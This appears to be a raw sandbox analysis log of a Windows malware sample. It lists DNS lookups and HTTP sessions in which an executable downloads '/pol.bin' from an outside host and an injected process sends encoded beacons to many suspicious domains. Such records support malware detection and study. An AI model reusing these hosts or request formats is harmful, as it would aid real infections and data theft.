                                                                                Nov 25, 2024 12:01:51.768299103 CET4980680192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:51.900434017 CET8049806208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:54.288429976 CET4980780192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:54.420717001 CET8049807208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:54.420953989 CET4980780192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:54.424179077 CET4980780192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:54.556518078 CET8049807208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:56.944104910 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.076231956 CET8049808208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:57.076406956 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.079617977 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.079689980 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.079704046 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.211566925 CET8049808208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:59.599951029 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:59.732366085 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:59.732650042 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:59.734838963 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:59.915872097 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202306032 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202317953 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202414989 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202429056 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202516079 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:02:00.202786922 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:02:00.203541994 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:02:00.335745096 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:05.208026886 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:05.511590004 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.511876106 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:05.515039921 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:05.818367004 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.819756985 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.819766045 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.820043087 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:07.019423962 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.035476923 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.354940891 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.355139017 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.358321905 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.677699089 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.678581953 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.678633928 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.678891897 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:09.862561941 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:10.878640890 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.187298059 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.187525988 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.190808058 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.190857887 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.499351978 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499401093 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499437094 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499466896 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499615908 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499651909 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499752998 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.500478983 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.500518084 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.500722885 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:12.705724001 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:13.721785069 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.021703005 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.021962881 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.024198055 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.323895931 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.324695110 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.324779987 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.324984074 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.325702906 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.625382900 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:19.329929113 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:19.632698059 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.632908106 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:19.636074066 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:19.938723087 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.955864906 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.955874920 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.956015110 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:21.141313076 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.157934904 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.457051992 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.457330942 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.460503101 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.759712934 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.779562950 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.779608011 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.779834986 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:23.968924999 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:24.985317945 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.285501957 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.285871983 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.289370060 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.289396048 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.289448977 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.589608908 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.589623928 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.589641094 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.589827061 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.606828928 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.606843948 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.607018948 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:26.796416998 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:27.812474966 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.099783897 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.100042105 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.102202892 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.389448881 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.406161070 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.406320095 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.406599045 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.407146931 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.694341898 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:33.420686960 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:33.738605022 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:33.738830090 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:33.742006063 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:34.059695005 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:34.062474966 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:34.062484980 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:34.062658072 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:35.247631073 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.263837099 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.579875946 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.580096960 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.583499908 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.899539948 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.902487993 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.902498007 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.902633905 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:38.090760946 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.106998920 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.425246000 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.425594091 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.428847075 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.428934097 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.747142076 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747189045 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747241974 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747287989 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747349024 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747383118 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.750567913 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.750613928 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.750797987 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:40.933912039 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:41.950207949 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.271400928 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.271672010 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.273834944 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.594692945 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.597754002 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.597767115 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.598121881 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.598762989 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.919574022 CET804982143.155.76.124192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Nov 25, 2024 11:59:57.329438925 CET6528753192.168.11.209.9.9.9
                                                                                Nov 25, 2024 11:59:57.515285969 CET53652879.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:10.873238087 CET5010953192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:11.056832075 CET53501099.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:24.526606083 CET6380453192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:24.632970095 CET53638049.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:32.681152105 CET5570453192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:32.786787987 CET53557049.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:45.912487030 CET6026453192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:46.018776894 CET53602649.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:01:43.477663994 CET5171653192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:01:43.585242033 CET53517169.9.9.9192.168.11.20
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 25, 2024 11:56:55.504550934 CET192.168.11.201.1.1.10xbb33Standard query (0)enechado.ru.comA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:26.057734966 CET192.168.11.201.1.1.10x631fStandard query (0)www.officinadelpasso.shopA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:41.827888966 CET192.168.11.201.1.1.10x827dStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:55.171067953 CET192.168.11.201.1.1.10x9fd2Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:08.416037083 CET192.168.11.201.1.1.10x6eeStandard query (0)www.nartex-uf.onlineA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:23.350100040 CET192.168.11.201.1.1.10xebdbStandard query (0)www.newtoppornx1.buzzA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:31.504426956 CET192.168.11.201.1.1.10x5cbcStandard query (0)www.614genetics.onlineA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:45.423242092 CET192.168.11.201.1.1.10xb810Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:46.437798023 CET192.168.11.209.9.9.90xb810Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:01.107327938 CET192.168.11.209.9.9.90xf38eStandard query (0)www.cg19g5.proA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.385430098 CET192.168.11.209.9.9.90x8b72Standard query (0)www.nuy25c9t.sbsA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:29.991569042 CET192.168.11.209.9.9.90x8273Standard query (0)www.golivenow.liveA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:43.504280090 CET192.168.11.209.9.9.90x4b89Standard query (0)www.kanadeviainova.netA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:57.329438925 CET192.168.11.209.9.9.90x33fbStandard query (0)www.mydreamdeal.clickA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:10.873238087 CET192.168.11.209.9.9.90x5f9bStandard query (0)www.aquax.cloudA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:24.526606083 CET192.168.11.209.9.9.90xbf98Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:32.681152105 CET192.168.11.209.9.9.90x8bf8Standard query (0)www.108.foundationA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:45.912487030 CET192.168.11.209.9.9.90x5b0Standard query (0)www.bagazone.onlineA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:01:43.477663994 CET192.168.11.209.9.9.90x2bb3Standard query (0)www.newtoppornx1.buzzA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 25, 2024 11:56:55.619509935 CET1.1.1.1192.168.11.200xbb33No error (0)enechado.ru.com103.83.194.50A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:26.389983892 CET1.1.1.1192.168.11.200x631fNo error (0)www.officinadelpasso.shopofficinadelpasso.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:26.389983892 CET1.1.1.1192.168.11.200x631fNo error (0)officinadelpasso.shop195.110.124.133A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:41.931122065 CET1.1.1.1192.168.11.200x827dNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:41.931122065 CET1.1.1.1192.168.11.200x827dNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:55.282571077 CET1.1.1.1192.168.11.200x9fd2No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:55.282571077 CET1.1.1.1192.168.11.200x9fd2No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:08.755079985 CET1.1.1.1192.168.11.200x6eeNo error (0)www.nartex-uf.online31.31.196.177A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:23.451129913 CET1.1.1.1192.168.11.200xebdbName error (3)www.newtoppornx1.buzznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:31.673877954 CET1.1.1.1192.168.11.200x5cbcNo error (0)www.614genetics.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:46.997029066 CET9.9.9.9192.168.11.200xb810No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:46.997029066 CET9.9.9.9192.168.11.200xb810No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:47.157685995 CET1.1.1.1192.168.11.200xb810No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:47.157685995 CET1.1.1.1192.168.11.200xb810No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:01.275343895 CET9.9.9.9192.168.11.200xf38eNo error (0)www.cg19g5.pro154.88.22.105A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)www.nuy25c9t.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111.kunlundns.top43.155.76.124A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:30.102003098 CET9.9.9.9192.168.11.200x8273No error (0)www.golivenow.live66.29.149.46A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:43.768214941 CET9.9.9.9192.168.11.200x4b89No error (0)www.kanadeviainova.netkanadeviainova.netCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:43.768214941 CET9.9.9.9192.168.11.200x4b89No error (0)kanadeviainova.net81.88.58.216A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:57.515285969 CET9.9.9.9192.168.11.200x33fbNo error (0)www.mydreamdeal.click104.21.27.59A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:57.515285969 CET9.9.9.9192.168.11.200x33fbNo error (0)www.mydreamdeal.click172.67.169.6A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:11.056832075 CET9.9.9.9192.168.11.200x5f9bNo error (0)www.aquax.cloud45.81.23.25A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:24.632970095 CET9.9.9.9192.168.11.200xbf98Name error (3)www.75178.clubnonenoneA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:32.786787987 CET9.9.9.9192.168.11.200x8bf8No error (0)www.108.foundation13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:32.786787987 CET9.9.9.9192.168.11.200x8bf8No error (0)www.108.foundation76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:46.018776894 CET9.9.9.9192.168.11.200x5b0Name error (3)www.bagazone.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:01:43.585242033 CET9.9.9.9192.168.11.200x2bb3Name error (3)www.newtoppornx1.buzznonenoneA (IP address)IN (0x0001)false
                                                                                • enechado.ru.com
                                                                                • www.officinadelpasso.shop
                                                                                • www.vayui.top
                                                                                • www.tals.xyz
                                                                                • www.nartex-uf.online
                                                                                • www.614genetics.online
                                                                                • www.prhmcjdz.tokyo
                                                                                • www.cg19g5.pro
                                                                                • www.nuy25c9t.sbs
                                                                                • www.golivenow.live
                                                                                • www.kanadeviainova.net
                                                                                • www.mydreamdeal.click
                                                                                • www.aquax.cloud
                                                                                • www.108.foundation
                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                0 | 192.168.11.20 | 49741 | 103.83.194.50 | 80 | 4604 | C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:56:55.795540094 CET | 167 | OUT | GET /pol.bin HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                Host: enechado.ru.com
                                                                                Cache-Control: no-cache
                                                                                Nov 25, 2024 11:56:55.967170000 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 10:56:55 GMT
                                                                                Server: Apache
                                                                                Last-Modified: Mon, 25 Nov 2024 09:44:12 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 289856
                                                                                Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                1 | 192.168.11.20 | 49742 | 195.110.124.133 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:57:26.588319063 CET | 463 | OUT | GET /vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.officinadelpasso.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:57:26.782552004 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                2 | 192.168.11.20 | 49743 | 172.67.145.234 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:57:42.032996893 CET | 709 | OUT | POST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5SWd7vWWIOMxdsEPgaHRV72KeT871dqMC2Q==
                                                                                Nov 25, 2024 11:57:42.266962051 CET | 885 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:42 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nn%2FY3DFf23%2Fnv1pl6kKEYYRLmOSlP4zMhfz%2BIeD9s4j5GkPjBr%2BKxJuNfO9sT%2F0ZTQdRD84sox9j22%2Blyghgq9uOesy5pAxWfKPh%2B5fcGeAAPsiR3y1tFgxjBQrz68l"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811e8e0c0e43da-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97323&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 11:57:42.267007113 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
